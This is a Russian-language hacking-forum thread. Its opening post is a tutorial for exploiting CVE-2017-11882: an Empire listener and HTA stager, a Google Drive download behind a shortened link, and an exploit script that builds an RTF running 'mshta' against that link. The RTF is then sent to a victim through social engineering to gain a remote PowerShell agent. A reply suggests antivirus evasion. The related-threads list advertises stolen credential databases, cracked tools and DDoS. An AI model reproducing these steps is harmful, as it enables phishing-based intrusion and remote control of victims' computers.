CVE-2017-11882 или Взлом с помощью безобидного документа

  • Автор темы Gidroponika
  • Дата начала
G

Gidroponika

Всем привет. Сегодня хочу показать Вам эксплоит, с помощью которого мы получим доступ к целевой машине.

Коротко и по делу:

Создаем файл в формате RTF с вызовом функции командной строки mshta , которая позволит вызвать powershell с помощью HTA файла, расположенного на удаленном сервере.

Поехали!

Источник :

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.



Установка :
Код:
git clone https://github.com/Ridter/CVE-2017-11882
cd CVE-2017-11882
chmod +x Command109b_CVE-2017-11882.py
chmod +x Command43b_CVE-2017-11882.py


На этом все.



Теперь создадим HTA файл с помощью [Empire] Post-Exploitation Framework

Источник :

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.






Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.




Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.



Собственно говоря, поехали:



Listeners у меня уже есть, что бы их создать, проделаем :

listeners

uselistener http

Далее заполняем нужные поля с помощью set

Пример : set Name http - задать имя листенера http

set Host ip - пишем айпишник куда стучаться вистиму

set Port номер порта - пишем на какой порт стукать

execute - выполнить, создать



Далее у вас появится листенер. Можно вернутся в главное меню с помощью: main

7b281a75e1d3eea61d7f7.png

Создание HTA

5b57ce44ca695bb4f5d74.png

usestager windows/hta - использовать модуль

info - посмотреть инфу и обычно заполнить Listener

set Listener http (у меня так называется листенер "http")

set OutFile /tmp/hack1.hta - путь к сохранению файла и название

execute - генерим и получаем на выходе

be80edfdd26dce183bb66.png

Далее идем в папочку /tmp берем этот файлик и заливаем на любой файлообменник. К примеру Google Drive.

623e5d19b9234c6a5bc17.png

Далее включаем доступ на скачивание всем у кого есть ссылка. Копируем ссылку и переходим по ней :

096e73ca582adfd86edd0.png

425c8e786482903872f77.png

Здесь копируем ссылку на скачивание файла и идем к любому сервису по сокращению ссылок. Я предпочел гугловский:

a7d0830cdc7de5102fe3f.png

Копируем это батву, идем в каталог где мы установили софт. У меня это :

Код:
cd CVE-2017-11882
Здесь исполняем следующее :
Код:
python Command109b_CVE-2017-11882.py -c "mshta сюда вставить сокращенную ссылку" -o codeby.rtf


7d83c95031c3bf297e2b5.png

Файл создан в формате rft. Почему так, объясню в конце статьи. Далее отправляем потенциальному клиенту.. ) Уж тут кто что придумает, в помощь СИ) И после запуска файла видим следующую картину )

28139bc968fc53aaf14d2.png

YEAAH! PROF1t! Теперь на машине, которая запустила файл в процессах появится наш родимый и неповторимый PowerShell, а значит Мы в системе, тому свидетельствуем подключение агента в империи ) Далее делаем чего душе угодно. В Империи куча фичей прикольных, в том числе и трольских)



Дополнительная информация : Почему RTF? Почему не DOC? Дело в том, что я часа 2 убил на то, что бы тестировать файлы док. Тестируемая машина вин 10 с 16тым офисом, запускал и ничего не происходило. Долго не мог понять что такое, да и забил. Создал в ртф и просто супер. Никаких проблем. Запускается файл, далее вылазит обычное окошко " разрешить редактирование файла " это никакое не предупреждение безопасности как в макросах, это банальщина и ничего в себе таинственного она не несет. После разрешения редактирования мигает окошко ПоверШелл и все, система завоевана.



Как обстоят дела с обнаружением ? Тут дело такое, первый раз когда создал, видел только Касперыч. Буквально через несколько часов еще парочка. И того 3, из них самый распространенный Касперский.


По мне так очень даже хорошие показатели. Способ довольно простой, не требует особых хацких навыков. Всем профит!
 
M

Major1

О, только думаю "забавная CVE нада разобрать", а тут статейка)
AV вообще не палит если строку павершелла сформировать из цикла статей

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

от Даркнода)
 
M

Major1

Как понял я,форум обновляется,но зачем тогда былое заливать. Если не ошибаюсь,где то октяб нояб 17 года))
 
Название темы
Автор Заголовок Раздел Ответы Дата
1 CVE-2017-0199 Spam/DDOS/Malware 0
G Уязвимость Microsoft Office CVE-2017-8570 Kali Linux 0
TarasGyska VMware Escape Exploit, CVE-2017-4901 Уязвимости и взлом 0
Admin Тестирования уязвимости в продукции Microsoft Office - CVE-2017-0199 Уязвимости и взлом 0
Support81 10 из 10: В Linux обнаружен встроенный бэкдор (CVE-2024-3094) Новости в сети 0
Emilio_Gaviriya Статья CVE: Подборка ресурсов по поиску уязвимостей. Уязвимости и взлом 0
D Office CVE-2021-40444 remote code execution native builder Продажа софта 0
P CUPS Remote Code Execution exploit (CVE-2015-1158) Уязвимости и взлом 0
A Zabugor zomato.com [2017-11-05] [5,104,292 lines] Раздача email 0
B Сколько можно было заработать на одном биткоине с 2017 года Новости в сети 0
B Joomla-Ученик 12 фишек без которых Вы гарантированно не создадите полноценный сайт на Joomla 9 (2017) Полезные статьи 0
G Продам ПРОДАМ БАЗУ MAIL:PASS НЕ ИСПОЛЬЗОВАННАЯ ДЕКАБРЬ 2017 Доступы - FTP, shell'ы, руты, sql-inj, БД 0
V [Udemy.com] Изучаем Социальную Инженерию с Нуля 2017 (все части) Полезные статьи 5
K Социальная уверенность (2017)Автор: Патрик Кинг Другое 0
K Курс по сайтостроению 2017, на основе премиум шаблона для WordPress "AVADA" (Шаблон прилагается) Другое 0
K [Udemy.com] Полный курс по кибербезопасности Секреты хакеров! [2017] Часть 1,2,3,4,5,6,7,8 Другое 0
K TheBrain - ваша персональная база знаний (2017) Другое 0
K Современный JavaScript Полный курс - Построим 10 проектов - Udemy (2017) Другое 0
K Вебинар Взлом социальной сети (2017) Раздача dedic/ssh/proxy 8
K Пак курсов Нетологии за 2017-2018 годы Другое 0
K Мегапак шаблонов и плагинов для Wordpress и Woocommerce(2017) https://cloud.mail.ru/public/8J47/yCR2BqM2D/ Другое 0
H MIX Ап за 2017 654 мб Раздача email 0
V Слив интенсива по товарному бизнесу 2017 от Белого, Попова и Дунаева Другое 0
H Удаление сообщений у себя и получателя ВКонтакте [14.12.2017] Новости в сети 0
NickelBlack Socks 5 fresh 01-17.2017 Раздача dedic/ssh/proxy 1
АнАлЬнАя ЧуПаКаБрА INLINE Рабочий обход CloudFlare для Private Keeper'a ( от 01.12.2017 ) Полезные статьи 0
Little_Prince Socks5 [12915] [25.11.2017] [19:16] Раздача dedic/ssh/proxy 0
S BETPROFI 2017 !!! [CRACK] 19.11.17 Софт для работы с текстом/Другой софт 16
L Ddos with Kali Linix ZAmbIE 2017 Полезные статьи 1
S [Udemy] Полный курс по кибербезопасности: Секреты хакеров! [2017] Часть 2 из 8. Русский перевод Уязвимости и взлом 7
MRobot WIRESHARK: от начального до продвинутого уровня (2017) (WCNA) Уязвимости и взлом 11
E Zeus Botnet 5.0.0.1 [2017] Уязвимости и взлом 1
E DDOS по номеру телефона Атака звонками на телефон 2017 Полезные статьи 4
N SQLi Dumper All Full Version 9.2.1,9.2,8.5,8.2,8.0,7.0,5.1 Full Crack 2017 Софт для работы с текстом/Другой софт 3
Кракозябра Свежак прокси на 23.07.2017 Раздача dedic/ssh/proxy 1
Кракозябра Свежак прокси на 21.07.2017 Раздача dedic/ssh/proxy 1
Кракозябра Свежак прокси на 20.07.2017 Раздача dedic/ssh/proxy 4
impak Скрытая RMS сборка 2017. (Пропатченная) Софт от наших юзеров 3
R Путь веб-разработчика в 2017 Другие ЯП 1
R Лучший формат для резюме программиста в 2017 Другие ЯП 2
M VK Brute New - [Cracked By PC-RET] (03.05.2017) Бруты/Парсеры/Чекеры 0
АнАлЬнАя ЧуПаКаБрА Brute and Checker BIGLION 2017 Бруты/Парсеры/Чекеры 11
Little_Prince [Tools] Text Utils byGuron v1.2 fix (2017.04.23) Софт для работы с текстом/Другой софт 1
E СПОСОБ! Удаляем чужую страницу Вконтакте 2017 Уязвимости и взлом 3
P VK Brute New - [Cracked By PC-RET] (07.03.2017) Бруты/Парсеры/Чекеры 8
T [HTTP/S & Socks4/5] Свежие прокси на 06.03.2017 Раздача dedic/ssh/proxy 1
T [HTTP/S & Socks4/5] Свежие прокси на 02.03.2017 Раздача dedic/ssh/proxy 0
T [HTTP/S & Socks4/5] Свежие прокси на 01.03.2017 Раздача dedic/ssh/proxy 1
T [HTTP/S & Socks4/5] Свежие прокси на 27.02.2017 Раздача dedic/ssh/proxy 2
T [HTTP/S & Socks4/5] Свежие прокси на 26.02.2017 Раздача dedic/ssh/proxy 0

Название темы